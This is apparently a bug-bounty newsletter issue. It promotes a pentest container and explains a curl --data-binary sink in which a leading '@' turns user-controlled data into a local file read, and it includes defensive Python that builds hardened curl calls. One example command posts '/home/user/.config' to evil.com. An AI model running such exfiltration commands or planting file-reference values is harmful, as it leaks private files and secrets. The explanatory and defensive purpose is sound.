A Pentest Box and the 35 words to Python

Hi,

You are receiving this email because you subscribed to Sim4n6’s newsletter, a monthly newsletter dedicated to bug bounty hunting, Linux 🐧, Python, and much more.

@Sim4n6

A Pentest Box container 📦️ 

A docker image made to encapsulate the most commonly used CLI tools for bug bounty hunting. Because why pollute the main host when you can have them all in a separate container? 🔗 https://github.com/Sim4n6/APentestBox

Simply run the following command to drop straight into the container shell:

sudo docker run -it --name apb sim4n6/apentestbox:latest

Learning Python Corner 🐍 

Are you aware that to grasp the basics of Python, you only need to understand 35 unique words? 🔗 The 35 words You need to Python

The vulnerability is sometimes so subtle

Say you control the value passed to --data-binary, the $'foo=bar' sink in the following curl POST request:

curl -i -s -k \
    -X $'POST' \
    -H $'Host: portswigger.net' \
    -H $'Content-Type: application/x-www-form-urlencoded' \
    -H $'Content-Length: 7' \
    --data-binary $'foo=bar' \
    $'https://portswigger.net/'

You have just identified a local-file disclosure vulnerability. How?

According to the curl documentation, the previous command posts the data exactly as specified, with no extra processing whatsoever. But if the data foo=bar starts with the character “@”, curl treats the rest as a filename, like:

curl --data-binary @/home/user/.config https://evil.com

So rather than POSTing the literal data foo=bar, you end up sending the contents of the file at /home/user/.config, because curl reads it for the @/home/user/.config argument.
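To make the sink concrete from the defender's side, here is an added example (mine, not from the newsletter or the PortSwigger report) of a hypothetical application wrapper that shells out to curl with user-supplied data. It shows the vulnerable construction, a check that flags a body curl would reinterpret as a filename, and two hardened variants: --data-raw, which curl documents as posting the string without the special interpretation of "@", and feeding the body through stdin with "@-" so the user string is never a curl argument. The function names and the URL/body values are assumptions for illustration.

```python
"""Added example (not from the newsletter): how a leading '@' in user-controlled
data reaches curl's --data-binary, and two ways to neutralise it."""
import shlex


def build_curl_vulnerable(url: str, body: str) -> list:
    """VULNERABLE (hypothetical wrapper): curl treats a body that starts with '@'
    as '@<filename>' and POSTs that file's contents instead of the literal string."""
    return ["curl", "-s", "-k", "-X", "POST", "--data-binary", body, url]


def body_is_file_reference(body: str) -> bool:
    """Detection check: would curl's -d/--data-binary read a file for this body?
    Only a *leading* '@' triggers the file read; an '@' later in the string stays literal."""
    return body.startswith("@")


def build_curl_hardened(url: str, body: str) -> list:
    """Hardened: --data-raw (curl 7.43.0+) posts the string verbatim and never
    interprets '@'."""
    return ["curl", "-s", "-k", "-X", "POST", "--data-raw", body, url]


def build_curl_stdin(url: str, body: str):
    """Alternative for older curl builds: keep --data-binary but point it at stdin
    with '@-' and pass the user string on stdin, so curl never sees it as an
    argument it could reinterpret. Returns (argv, stdin_bytes)."""
    return (["curl", "-s", "-k", "-X", "POST", "--data-binary", "@-", url],
            body.encode("utf-8"))


def render(argv) -> str:
    """Shell-quoted rendering of the argv, for logging and code review."""
    return shlex.join(argv)


if __name__ == "__main__":
    url = "https://portswigger.net/"
    # Constructed sample bodies: benign, the file-reference case, and an embedded '@'.
    for body in ("foo=bar", "@/home/user/.config", "user@example.com"):
        print(f"body={body!r} file_reference={body_is_file_reference(body)}")
        print("  vulnerable:", render(build_curl_vulnerable(url, body)))
        print("  hardened:  ", render(build_curl_hardened(url, body)))
```

The check in body_is_file_reference is deliberately narrow: it mirrors curl's documented rule (a leading "@" only), so it is useful as a unit test or log filter for an existing wrapper, while the real fix is to stop passing untrusted strings to an option that has special-character handling at all.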

That was Paul Mutton's private report to the PortSwigger Web Security bug bounty program. The details of the write-up are here.

The end